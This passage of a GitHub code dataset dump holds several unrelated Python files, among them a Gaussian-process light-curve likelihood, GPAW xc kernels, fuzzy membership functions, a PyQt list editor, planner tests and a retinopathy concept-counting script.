*args, **kwargs):\n if george is None:\n raise ImportError(\"george is required for the GP model\")\n kwargs[\"cache\"] = kwargs.pop(\"cache\", False)\n super(GPLikelihood, self).__init__(*args, **kwargs)\n\n def get_result(self, query, parent_response):\n lcs = [LCWrapper(lc, tau_frac=query[\"tau_frac\"])\n for lc in parent_response.light_curves]\n return dict(model_light_curves=lcs)\n\n\nclass LCWrapper(object):\n\n def __init__(self, lc, dist_factor=10.0, time_factor=0.1, tau_frac=0.25):\n self.time = lc.time\n mu = np.median(lc.flux)\n self.flux = lc.flux / mu - 1.0\n self.ferr = lc.ferr / mu\n\n # Convert to parts per thousand.\n self.flux *= 1e3\n self.ferr *= 1e3\n\n # Estimate the kernel parameters.\n tau = tau_frac * estimate_tau(self.time, self.flux)\n self.kernel = np.var(self.flux) * Matern32Kernel(tau ** 2)\n self.gp = george.GP(self.kernel, solver=george.HODLRSolver)\n self.K_0 = self.gp.get_matrix(self.time)\n self.gp.compute(self.time, self.ferr, seed=1234)\n self.alpha = self.gp.solver.apply_inverse(self.flux)\n\n # Compute the likelihood of the null model.\n self.ll0 = self.lnlike()\n\n # def lnlike(self, model=None):\n # # No model is given. 
Just evaluate the lnlikelihood.\n # if model is None:\n # return -0.5 * np.dot(self.flux, self.alpha)\n\n # # A model is given, use it to do a linear fit.\n # m = model(self.time)\n # if m[0] != 0.0 or m[-1] != 0.0 or np.all(m == 0.0):\n # return 0.0, 0.0, 0.0\n\n # # Compute the inverse variance.\n # Cm = self.gp.solver.apply_inverse(m)\n # S = np.dot(m, Cm)\n # if S <= 0.0:\n # return 0.0, 0.0, 0.0\n\n # # Compute the depth.\n # d = np.dot(m, Cf) / S\n # if not np.isfinite(d):\n # return 0.0, 0.0, 0.0\n\n # # Compute the lnlikelihood.\n # dll = -0.5*np.dot(self.flux-d*m, Cf-d*Cm) - self.ll0\n # if not np.isfinite(dll):\n # return 0.0, 0.0, 0.0\n\n # return dll, d, S\n\n # def predict(self, y=None):\n # if y is None:\n # y = self.flux\n # return self.gp.predict(y, self.time, mean_only=True)\n\n def lnlike_eval(self, y):\n return -0.5 * np.dot(y, self.gp.solver.apply_inverse(y))\n\n def lnlike(self, model=None):\n if model is None:\n return -0.5 * np.dot(self.flux, self.alpha)\n\n # Evaluate the transit model.\n m = model(self.time)\n if m[0] != 0.0 or m[-1] != 0.0 or np.all(m == 0.0):\n return 0.0, 0.0, 0.0\n\n Km = self.gp.solver.apply_inverse(m)\n Ky = self.alpha\n ivar = np.dot(m, Km)\n depth = np.dot(m, Ky) / ivar\n r = self.flux - m*depth\n ll = -0.5 * np.dot(r, Ky - depth * Km)\n return ll - self.ll0, depth, ivar\n\n def predict(self, y=None):\n if y is None:\n y = self.flux\n return np.dot(self.K_0, self.gp.solver.apply_inverse(y))\n","repo_name":"dfm/ketu","sub_path":"ketu/kepler/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"36"} +{"seq_id":"37569237521","text":"def absol(x):\n if x>= 0:\n return x\n elif x < 0:\n return -x\n else:\n return 'slutt å tull'\n\ntall = int(input('Hvilket tall vil du ha absoluttverdien til? 
'))\nprint(f\"Absoluttverdien til {tall} er\", absol(tall))","repo_name":"jorul/ITGK","sub_path":"ITGK øvinger/Øving 5 uke 41/Varierte funksjoner/a absoluttverdi.py","file_name":"a absoluttverdi.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"37349149947","text":"\"\"\"XC density kernels for response function calculations.\"\"\"\n\nimport numpy as np\n\nfrom my_gpaw.response.localft import LocalFTCalculator\nfrom my_gpaw.response.fxc_kernels import AdiabaticFXCCalculator\n\n\ndef get_density_xc_kernel(qpd, gs, context, functional='ALDA',\n rshelmax=-1, rshewmin=None,\n chi0_wGG=None):\n \"\"\"Density-density xc kernels.\n Factory function that calls the relevant functions below.\"\"\"\n\n p = context.print\n nspins = len(gs.nt_sR)\n assert nspins == 1\n\n if functional[0] == 'A':\n # Standard adiabatic kernel\n p('Calculating %s kernel' % functional)\n localft_calc = LocalFTCalculator.from_rshe_parameters(\n gs, context, rshelmax=rshelmax, rshewmin=rshewmin)\n fxc_calculator = AdiabaticFXCCalculator(localft_calc)\n fxc_kernel = fxc_calculator(functional, '00', qpd)\n Kxc_GG = fxc_kernel.get_Kxc_GG()\n\n if qpd.kd.gamma:\n Kxc_GG[0, :] = 0.0\n Kxc_GG[:, 0] = 0.0\n Kxc_sGG = np.array([Kxc_GG])\n elif functional[:2] == 'LR':\n p('Calculating LR kernel with alpha = %s' % functional[2:])\n Kxc_sGG = calculate_lr_kernel(qpd, alpha=float(functional[2:]))\n elif functional == 'Bootstrap':\n p('Calculating Bootstrap kernel')\n Kxc_sGG = get_bootstrap_kernel(qpd, chi0_wGG, context)\n else:\n raise ValueError('Invalid functional for the density-density '\n 'xc kernel:', functional)\n\n return Kxc_sGG[0]\n\n\ndef calculate_lr_kernel(qpd, alpha=0.2):\n \"\"\"Long range kernel: fxc = \\alpha / |q+G|^2\"\"\"\n\n assert qpd.kd.gamma\n\n f_G = np.zeros(len(qpd.G2_qG[0]))\n f_G[0] = -alpha\n f_G[1:] = -alpha / qpd.G2_qG[0][1:]\n\n return np.array([np.diag(f_G)])\n\n\ndef get_bootstrap_kernel(qpd, chi0_wGG, context):\n \"\"\" Bootstrap kernel (see below) \"\"\"\n\n if context.comm.rank == 0:\n chi0_GG = chi0_wGG[0]\n if context.comm.size > 1:\n # If size == 1, chi0_GG is not contiguous, and broadcast()\n # will fail in debug mode. So we skip it until someone\n # takes a closer look.\n context.comm.broadcast(chi0_GG, 0)\n else:\n nG = qpd.ngmax\n chi0_GG = np.zeros((nG, nG), complex)\n context.comm.broadcast(chi0_GG, 0)\n\n return calculate_bootstrap_kernel(qpd, chi0_GG, context)\n\n\ndef calculate_bootstrap_kernel(qpd, chi0_GG, context):\n \"\"\"Bootstrap kernel PRL 107, 186401\"\"\"\n p = context.print\n\n if qpd.kd.gamma:\n v_G = np.zeros(len(qpd.G2_qG[0]))\n v_G[0] = 4 * np.pi\n v_G[1:] = 4 * np.pi / qpd.G2_qG[0][1:]\n else:\n v_G = 4 * np.pi / qpd.G2_qG[0]\n\n nG = len(v_G)\n K_GG = np.diag(v_G)\n\n Kxc_GG = np.zeros((nG, nG), dtype=complex)\n dminv_GG = np.zeros((nG, nG), dtype=complex)\n\n for iscf in range(120):\n dminvold_GG = dminv_GG.copy()\n Kxc_GG = K_GG + Kxc_GG\n\n chi_GG = np.dot(np.linalg.inv(np.eye(nG, nG)\n - np.dot(chi0_GG, Kxc_GG)), chi0_GG)\n dminv_GG = np.eye(nG, nG) + np.dot(K_GG, chi_GG)\n\n alpha = dminv_GG[0, 0] / (K_GG[0, 0] * chi0_GG[0, 0])\n Kxc_GG = alpha * K_GG\n p(iscf, 'alpha =', alpha, flush=False)\n error = np.abs(dminvold_GG - dminv_GG).sum()\n if np.sum(error) < 0.1:\n p('Self consistent fxc finished in %d iterations !' 
% iscf)\n break\n if iscf > 100:\n p('Too many fxc scf steps !')\n\n return np.array([Kxc_GG])\n","repo_name":"f-fathurrahman/ffr-learns-gpaw","sub_path":"my_gpaw/response/density_kernels.py","file_name":"density_kernels.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"18955742169","text":"import matplotlib.pyplot as plt\nfrom matplotlib import rc\n\nfrom src.experiment.fs_study.setup import classifiers, experiment_setups\nfrom src.features.selection.wrappers import fs_wrappers\nfrom src.utils.file_handling.processors import CsvProcessor\n\nfont = {'family': 'normal',\n 'weight': 'normal',\n 'size': 12}\nrc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})\n\n## for Palatino and other serif fonts use:\nrc('font', **{'family': 'serif', 'serif': ['Palatino']})\nrc('text', usetex=True)\n\ndata_point_labels = [0.01, 0.02, 0.03, 0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1]\nmetric_positions = [0, 3, 5, 7, 13, 15]\nmarkers = ['d', 'o', 'h', '*', 'P', 'p', 's', 'v', '>', '<']\n\nfor experiment_name in experiment_setups.keys():\n plot_data = {}\n for wrapper in fs_wrappers:\n for classifier in classifiers:\n plot_data[classifier.name] = {}\n val_filename = '_'.join([wrapper.name, classifier.name, \"search\"])\n test_filename = '_'.join([wrapper.name, classifier.name, \"search\", \"test\"])\n print(\"Processing files {0} and {1}\".format(val_filename, test_filename))\n\n val_header, val_data = CsvProcessor().read_file(\n filename='summary/' + experiment_name + \"/\" + val_filename)\n test_header, test_data = CsvProcessor().read_file(\n filename='summary/' + experiment_name + \"/\" + test_filename)\n\n if val_header is not None and val_data is not None:\n dataset = ''\n labels = []\n pos = 0\n for i, row in enumerate(val_data):\n if row[0].split('_')[0] != dataset:\n if i == 0:\n dataset = row[0].split('_')[0]\n else:\n plt.title('-'.join([experiment_name.replace('_', '-'), wrapper.name, classifier.name,\n dataset.replace('_', '')]))\n plt.ylabel(r'Quality metrics', fontsize=13)\n plt.xlabel(r'NFEs\\textsubscript{max}', fontsize=13)\n plt.xlim([data_point_labels[0], data_point_labels[-1]])\n plt.ylim(top=1)\n plt.xticks(range(0, 14), data_point_labels)\n plt.tick_params()\n plt.legend(labels=labels, fancybox=False, framealpha=0.9)\n plt.tight_layout()\n plt.grid(b=True, linestyle=':')\n plt.show()\n # plt.savefig('-'.join([experiment_name.replace('_', '-'), wrapper.name, classifier.name,\n # dataset.replace('_', '')]) + \".pdf\",\n # format='pdf', dpi=300)\n plt.close()\n labels = []\n dataset = row[0].split('_')[0]\n pos = 0\n\n if pos in metric_positions:\n scores = [float(score) for score in row[1:]]\n plt.plot(scores, lw=0.75, ms=4, alpha=0.5, marker=markers[metric_positions.index(pos)])\n metric = row[0][row[0].find(dataset) + len(dataset) + 1:].replace('_', '')\n labels.append(metric)\n pos += 1\n plt.close()\n","repo_name":"MarioDudjak/FeatureSelectionWorkflow","sub_path":"reports/visualization/median_search_all_metrics_per_classifier_and_dataset.py","file_name":"median_search_all_metrics_per_classifier_and_dataset.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"42961076277","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n'''this module defines a square by: (based on 1-square.py)\n\n Private instance attribute: size\n Instantiation with optional size: 
def __init__(self, size=0):\n size must be an integer, otherwise raise a TypeError exception with\n the message size must be an integer\n if size is less than 0, raise a ValueError exception\n with the message size must be >= 0\n\n It also determines the area of the square\n '''\n\n\nclass Square:\n '''A Square class that defines a square and initialize\n the size attribute'''\n def __init__(self, size=0, position=(0, 0)):\n '''Initialize the size and position of a square\n\n Args:\n size(int): Size of the square\n\n '''\n self.size = size\n self.position = position\n\n @property\n def size(self):\n '''A method that retrieves the size of the square'''\n return self.__size\n\n @size.setter\n def size(self, value):\n '''Set the valid value of the size attribute'''\n if isinstance(value, int):\n if value < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = value\n else:\n raise TypeError(\"size must be an integer\")\n\n @property\n def position(self):\n '''A method that retrieves the position of the square'''\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"Define Setter method for __position\"\"\"\n if not isinstance(value, tuple) or len(value) != 2:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif not isinstance(value[0], int) or not isinstance(value[1], int):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif value[1] < 0 or value[0] < 0:\n raise ValueError(\"position must be a tuple of 2 positive integers\")\n else:\n self.__position = value\n\n def area(self):\n '''Determine the area of a square and return it'''\n return self.__size ** 2\n\n def my_print(self):\n \"\"\"Defining my_print method\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__position[1]):\n print()\n for i in range(self.__size):\n print(\" \" * self.__position[0], end=\"\")\n print('#' * self.__size)\n","repo_name":"solomonferede1/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"11606481940","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Membership_Function:\n @staticmethod\n def triangle(x, a, m, b):\n \"\"\"\n Retorna a função de pertinência triangular.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - a: float\n Valor do ponto de início da função.\n - m: float\n Valor do ponto médio da função.\n - b: float\n Valor do ponto de fim da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência triangular.\n \"\"\"\n y = np.zeros(x.shape[0]) # Definindo um array de saída do tamanho da entrada.\n first_half = np.logical_and(a < x, x <= m) # Definindo o intervalo de 'subida' da função.\n y[first_half] = (x[first_half] - a) / (m - a) # Definindo os valores da saída para o intervalo de 'subida'.\n second_half = np.logical_and(m <= x, x < b) # Definindo o intervalo de 'descida' da função.\n y[second_half] = (b - x[second_half]) / (b - m) # Definindo os valores da saída para o intervalo de 'descida'.\n return y\n \n @staticmethod\n def trapezoidal(x, a, m, n, b):\n \"\"\"\n Retorna a função de pertinência trapezoidal.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - a: float\n Valor do ponto de início da função.\n - m: float\n Valor do ponto médio esquerdo da função.\n - n: 
float\n Valor do ponto médio direito da função.\n - b: float\n Valor do ponto de fim da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência trapezoidal.\n \"\"\"\n y = np.zeros(x.shape[0]) # Definindo saída do tamaho da entrada.\n first_part = np.logical_and(a < x, x <= m) # Definindo o intervalo de subida.\n y[first_part] = (x[first_part] - a) / (m - a) # Definindo os valores da saída no intervalo de subida.\n second_part = np.logical_and(m < x, x < n) # Definindo o intervalo entre subida e decida.\n y[second_part] = 1 # Definindo o valor 1 para todo o intervalo entre subida e decida.\n third_part = np.logical_and(n <= x, x < b) # Definindo o intervalo de decida. \n y[third_part] = (b - x[third_part]) / (b - n) # Defininido os valores de saída para o intervalo de saída.\n return y\n \n @staticmethod\n def gaussian(x, k, m):\n \"\"\"\n Retorna a função de pertinência gaussiana.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - k: float\n Valor do parâmetro de largura da função.\n - m: float\n Valor do parâmetro de centro da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência gaussiana.\n \"\"\"\n k = k / 2\n expoent = (-1) * ((x - m) ** 2) / (k ** 2)\n return np.exp(expoent)\n \n @staticmethod\n def test_functions(type):\n \"\"\"\n Retorna várias funções de pertinência para testes.\n\n Parâmetros:\n - type: int\n Tipo de teste a ser retornado.\n\n Retorno:\n - range: np.ndarray\n Valores de entrada.\n - functions: np.ndarray\n Valores de saída correspondentes às funções de pertinência.\n \"\"\"\n range = np.arange(0, 100, 0.1)\n \n if type == 0: # Retorna uma função de cada tipo de maneira sequêncial\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.trapezoidal(range, 30, 40, 60, 70),\n Membership_Function.gaussian(range, 10, 85)\n ])\n if type == 1: # Retorna vários triângulos com 'm' iguais\n return range, np.array([\n Membership_Function.triangle(range, 0, 50, 100),\n Membership_Function.triangle(range, 10, 50, 90),\n Membership_Function.triangle(range, 20, 50, 80),\n Membership_Function.triangle(range, 30, 50, 70),\n Membership_Function.triangle(range, 40, 50, 60)\n ])\n if type == 2: # Retorna vários triangulos complementares\n return range, np.array([\n Membership_Function.triangle(range, 0, 0, 20),\n Membership_Function.triangle(range, 0, 20, 40),\n Membership_Function.triangle(range, 20, 40, 60),\n Membership_Function.triangle(range, 40, 60, 80),\n Membership_Function.triangle(range, 60, 80, 100),\n Membership_Function.triangle(range, 80, 100, 100)\n ])\n if type == 3: # Retorna vários trapézios com 'n' e 'm' iguais\n return range, np.array([\n Membership_Function.trapezoidal(range, 0, 40, 60, 100),\n Membership_Function.trapezoidal(range, 10, 40, 60, 90),\n Membership_Function.trapezoidal(range, 20, 40, 60, 80),\n Membership_Function.trapezoidal(range, 30, 40, 60, 70)\n ])\n if type == 4: # Retorna vários trapezios complementares\n return range, np.array([\n Membership_Function.trapezoidal(range, -1, 0, 5, 15),\n Membership_Function.trapezoidal(range, 5, 15, 25, 35),\n Membership_Function.trapezoidal(range, 25, 35, 45, 55),\n Membership_Function.trapezoidal(range, 45, 55, 65, 75),\n Membership_Function.trapezoidal(range, 65, 75, 85, 95),\n Membership_Function.trapezoidal(range, 85, 95, 100, 100)\n ])\n if type == 5: # Retorna várias gaussianas com 'm' iguais\n return range, np.array([\n Membership_Function.gaussian(range, 40, 50),\n 
Membership_Function.gaussian(range, 30, 50),\n Membership_Function.gaussian(range, 20, 50),\n Membership_Function.gaussian(range, 10, 50)\n ])\n if type == 6: # Retorna várias gaussianas complementares\n return range, np.array([\n Membership_Function.gaussian(range, 20, 20),\n Membership_Function.gaussian(range, 20, 0),\n Membership_Function.gaussian(range, 20, 40),\n Membership_Function.gaussian(range, 20, 60),\n Membership_Function.gaussian(range, 20, 80),\n Membership_Function.gaussian(range, 20, 100)\n ])\n if type == 7: # Retorna testes para opração de união\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.trapezoidal(range, 20, 50, 60, 95),\n Membership_Function.gaussian(range, 10, 80)\n ])\n if type == 8: # Retorna testes para opração de união\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.gaussian(range, 10, 30)\n ])\n if type == 9: # Retorna testes para opração de interseção\n return range, np.array([\n Membership_Function.trapezoidal(range, 5, 20, 40, 60),\n Membership_Function.gaussian(range, 20, 50)\n ])","repo_name":"Gustavo01rb/Fuzzy","sub_path":"fuzzy/membership_function.py","file_name":"membership_function.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"74157388582","text":"import sys\nfrom PyQt5.QtWidgets import QInputDialog, QLineEdit, QApplication, QMainWindow\nfrom listNancy import Ui_Dialog\n\nclass addForm(QMainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.ui.pushAdd.clicked.connect(self.addlisting)\n self.ui.pushEdit.clicked.connect(self.editlisting)\n self.ui.pushDelete.clicked.connect(self.dellisting)\n self.ui.pushDeleteAll.clicked.connect(self.delallist)\n\n def addlisting(self):\n self.ui.listWidget.addItem(self.ui.lineEdit.text())\n self.ui.lineEdit.setText('')\n self.ui.lineEdit.setFocus()\n\n def editlisting(self):\n row = self.ui.listWidget.currentRow()\n self.ui.listWidget.takeItem(row)\n text, okPressed = QInputDialog.getText(self, \"Get text\", \"New text:\", QLineEdit.Normal, \"\")\n if okPressed and text != '':\n self.ui.listWidget.insertItem(row, str(text))\n\n def dellisting(self):\n self.ui.listWidget.takeItem(self.ui.listWidget.currentRow())\n\n def delallist(self):\n self.ui.listWidget.clear()\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n addApp = addForm()\n addApp.show()\n sys.exit(app.exec_())\n","repo_name":"rntafirenyika/Portfolio","sub_path":"6. 
BSC Computing - Unisa/Year 1/INF1511 Visual Programming 1 with Python/OneDrive_2023-09-12/INF1511 GUI/List example/callListNancy.pyw","file_name":"callListNancy.pyw","file_ext":"pyw","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"32386449493","text":"import numpy as np\nimport random\nimport tensorflow as tf\nimport unittest\nfrom itertools import product\n\nfrom planner import GridworldModel, BanditsModel\nfrom gridworld import Direction\nfrom gridworld import GridworldMdp, GridworldMdpWithDistanceFeatures\nfrom gridworld import NStateMdpGaussianFeatures\nfrom agents import OptimalAgent, ImmediateRewardAgent\n\n\nclass TestPlanner(unittest.TestCase):\n\n\n def test_gridworld_planner(self):\n def check_model_equivalent(model, query, weights, mdp, num_iters):\n with tf.Session() as sess:\n sess.run(model.initialize_op)\n (qvals,) = model.compute(\n ['q_values'], sess, mdp, query, weight_inits=weights)\n\n agent = OptimalAgent(gamma=model.gamma, num_iters=num_iters)\n for i, proxy in enumerate(model.proxy_reward_space):\n for idx, val in zip(query, proxy):\n mdp.rewards[idx] = val\n agent.set_mdp(mdp)\n check_qvals_equivalent(qvals[i], agent, mdp)\n\n def check_qvals_equivalent(qvals, agent, mdp):\n for state in mdp.get_states():\n if mdp.is_terminal(state):\n continue\n x, y = state\n for action in mdp.get_actions(state):\n expected_q = agent.qvalue(state, action)\n action_num = Direction.get_number_from_direction(action)\n actual_q = qvals[y, x, action_num]\n # Using softmax, not max, so expect limited accuracy\n self.assertAlmostEqual(expected_q, actual_q, places=2)\n\n np.random.seed(1)\n random.seed(1)\n dim = 4\n grid = GridworldMdp.generate_random(8, 8, 0.1, dim)\n mdp = GridworldMdpWithDistanceFeatures(grid)\n mdp.rewards = np.random.randint(-9, 10, size=[dim])\n query = [0, 3]\n other_weights = mdp.rewards[1:3]\n # Use beta_planner = 1000 so that softmax is approximately max\n model = GridworldModel(\n dim, 0.9, len(query), 2, 1, None, 1, 1000, [], 0.1, False, True,\n 8, 8, 25)\n check_model_equivalent(model, query, other_weights, mdp, 25)\n\n\n\n def test_bandits_planner(self):\n def check_model_equivalent(model, query, weights, mdp, num_iters):\n with tf.Session() as sess:\n sess.run(model.initialize_op)\n (qvals,) = model.compute(['q_values'], sess, mdp, query, weight_inits=weights)\n\n agent = ImmediateRewardAgent(gamma=model.gamma)\n for i, proxy in enumerate(model.proxy_reward_space):\n mdp.change_reward(proxy)\n\n # for idx, val in zip(query, proxy):\n # mdp.rewards[idx] = val\n agent.set_mdp(mdp)\n check_qvals_equivalent(qvals[:,i], agent, mdp)\n\n def check_qvals_equivalent(qvals, agent, mdp):\n for state in mdp.get_states():\n if mdp.is_terminal(state):\n return\n expected_q = agent.qvalue(state, state)\n actual_q = qvals[state]\n self.assertAlmostEqual(expected_q, actual_q, places=5)\n\n dim = 5\n weights = np.random.randint(-9, 10, size=[dim])\n mdp = NStateMdpGaussianFeatures(\n num_states=7, rewards=weights, start_state=0,\n preterminal_states=[], feature_dim=dim, num_states_reachable=7)\n # query = [0, 2, 3]\n query = [0, 1, 2, 3, 4]\n # other_weights = np.array([weights[1], weights[4]])\n other_weights = np.zeros(0)\n model = BanditsModel(\n dim, 0.9, len(query), 2, 1, None, 1, 1000, [], 0.1, False, True)\n check_model_equivalent(model, query, other_weights, mdp, 20)\n\n\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"SoerenMind/Inverse_Reward_Design","sub_path":"Code/planner_test.py","file_name":"planner_test.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"28949398831","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\n#The code use to create the lower row of Figure 2\n#Plot the concept predictions for the FGADR testset for each DR level.\n\n#Inspect the FGADR test set instead:\nconceptPredictions_test = pd.read_csv('./SequentialModelOutput/RawDensenet121_conceptPredictions_FGADRTestset.csv',index_col = 'Unnamed: 0')\n\n#Counting number of positive predictions for MA\nMA_level0_predictions = 0\nMA_level1_predictions = 0\nMA_level2_predictions= 0\nMA_level3_predictions = 0\nMA_level4_predictions = 0\n#Repeat for HE:\nHE_level0_predictions = 0\nHE_level1_predictions = 0\nHE_level2_predictions= 0\nHE_level3_predictions = 0\nHE_level4_predictions = 0\n#Soft exudates:\nSoftEx_level0_predictions = 0\nSoftEx_level1_predictions = 0\nSoftEx_level2_predictions= 0\nSoftEx_level3_predictions = 0\nSoftEx_level4_predictions = 0\n#Hard exudates:\nHardEx_level0_predictions = 0\nHardEx_level1_predictions = 0\nHardEx_level2_predictions= 0\nHardEx_level3_predictions = 0\nHardEx_level4_predictions = 0\n#NV:\nNV_level0_predictions = 0\nNV_level1_predictions = 0\nNV_level2_predictions= 0\nNV_level3_predictions = 0\nNV_level4_predictions = 0\n#IRMA:\nIRMA_level0_predictions = 0\nIRMA_level1_predictions = 0\nIRMA_level2_predictions= 0\nIRMA_level3_predictions = 0\nIRMA_level4_predictions = 0\n\n#Count the number of observations for each DR level: \nlevel0_count = 0\nlevel1_count = 0\nlevel2_count = 0\nlevel3_count = 0\nlevel4_count = 0\nfor i in range(conceptPredictions_test.shape[0]):\n #Get the DR level\n dr_level = conceptPredictions_test.iloc[i,-1]\n print('Level of DR:',dr_level)\n #Get the raw concept predictions:\n concept_data = conceptPredictions_test.iloc[i,1]\n #Since these are (of unknown causes) interpreted as a string-list\n #We need to convert them to a proper list of float-values:\n concept_data = concept_data.strip('\"')\n concept_data = concept_data.strip('[]')\n concept_data = list(concept_data.split(','))\n concept_data = list(map(float,concept_data))\n print('Concept data:',concept_data)\n ma_concept = concept_data[0]\n he_concept = concept_data[1]\n softEx_concept = concept_data[2]\n hardEx_concept = concept_data[3]\n nv_concept = concept_data[4]\n irma_concept = concept_data[5]\n print('MA concept:',ma_concept)\n print('NV concept:',nv_concept)\n if dr_level == 0:\n level0_count+=1\n if ma_concept>=0:\n MA_level0_predictions+=1\n if he_concept>=0:\n HE_level0_predictions+=1\n if softEx_concept>=0:\n SoftEx_level0_predictions+=1\n if hardEx_concept>=0:\n HardEx_level0_predictions+=1\n if nv_concept>=0:\n NV_level0_predictions+=1\n if irma_concept>=0:\n IRMA_level0_predictions+=1\n elif dr_level ==1:\n level1_count+=1\n if ma_concept>=0:\n MA_level1_predictions+=1\n if he_concept>=0:\n HE_level1_predictions+=1\n if softEx_concept>=0:\n SoftEx_level1_predictions+=1\n if hardEx_concept>=0:\n HardEx_level1_predictions+=1\n if nv_concept>=0:\n NV_level1_predictions+=1\n if irma_concept>=0:\n IRMA_level1_predictions+=1\n elif dr_level == 2:\n level2_count+=1\n if ma_concept>=0:\n MA_level2_predictions+=1\n if he_concept>=0:\n HE_level2_predictions+=1\n if softEx_concept>=0:\n 
SoftEx_level2_predictions+=1\n if hardEx_concept>=0:\n HardEx_level2_predictions+=1\n if nv_concept>=0:\n NV_level2_predictions+=1\n if irma_concept>=0:\n IRMA_level2_predictions+=1\n elif dr_level == 3:\n level3_count+=1\n if ma_concept>=0:\n MA_level3_predictions+=1\n if he_concept>=0:\n HE_level3_predictions+=1\n if softEx_concept>=0:\n SoftEx_level3_predictions+=1\n if hardEx_concept>=0:\n HardEx_level3_predictions+=1\n if nv_concept>=0:\n NV_level3_predictions+=1\n if irma_concept>=0:\n IRMA_level3_predictions+=1\n elif dr_level == 4:\n level4_count+=1\n if ma_concept>=0:\n MA_level4_predictions+=1\n if he_concept>=0:\n HE_level4_predictions+=1\n if softEx_concept>=0:\n SoftEx_level4_predictions+=1\n if hardEx_concept>=0:\n HardEx_level4_predictions+=1\n if nv_concept>=0:\n NV_level4_predictions+=1\n if irma_concept>=0:\n IRMA_level4_predictions+=1\n \nprint('MA for DR level 0:', MA_level0_predictions)\nprint('HE for DR level 0:',HE_level0_predictions)\nprint('SoftEx for DR level 0:',SoftEx_level0_predictions)\nprint('HardEx for DR level 0:',HardEx_level0_predictions)\nprint('NV for DR level 0:',NV_level0_predictions)\nprint('IRMA for DR level 0:',IRMA_level0_predictions)\n\nprint('MA for DR level 1:', MA_level1_predictions)\nprint('HE for DR level 1:',HE_level1_predictions)\nprint('SoftEx for DR level 1:',SoftEx_level1_predictions)\nprint('HardEx for DR level 1:',HardEx_level1_predictions)\nprint('NV for DR level 1:',NV_level1_predictions)\nprint('IRMA for DR level 1:',IRMA_level1_predictions)\n\nprint('MA for DR level 2:', MA_level2_predictions)\nprint('HE for DR level 2:',HE_level2_predictions)\nprint('SoftEx for DR level 2:',SoftEx_level2_predictions)\nprint('HardEx for DR level 2:',HardEx_level2_predictions)\nprint('NV for DR level 2:',NV_level2_predictions)\nprint('IRMA for DR level 2:',IRMA_level2_predictions)\n\nprint('MA for DR level 3:', MA_level3_predictions)\nprint('HE for DR level 3:',HE_level3_predictions)\nprint('SoftEx for DR level 3:',SoftEx_level3_predictions)\nprint('HardEx for DR level 3:',HardEx_level3_predictions)\nprint('NV for DR level 3:',NV_level3_predictions)\nprint('IRMA for DR level 3:',IRMA_level3_predictions)\n\nprint('MA for DR level 4:', MA_level4_predictions)\nprint('HE for DR level 4:',HE_level4_predictions)\nprint('SoftEx for DR level 4:',SoftEx_level4_predictions)\nprint('HardEx for DR level 4:',HardEx_level4_predictions)\nprint('NV for DR level 4:',NV_level4_predictions)\nprint('IRMA for DR level 4:',IRMA_level4_predictions)\n\nprint('Total number of level 0 images:',level0_count)\nprint('Total number of level 1 images:',level1_count)\nprint('Total number of level 2 images:',level2_count)\nprint('Total number of level 3 images:',level3_count)\nprint('Total number of level 4 images:',level4_count)\n\n#plot barcharts for each DR level\nnum_concepts = 6\nbar_width = 0.35\n# create location for each bar. 
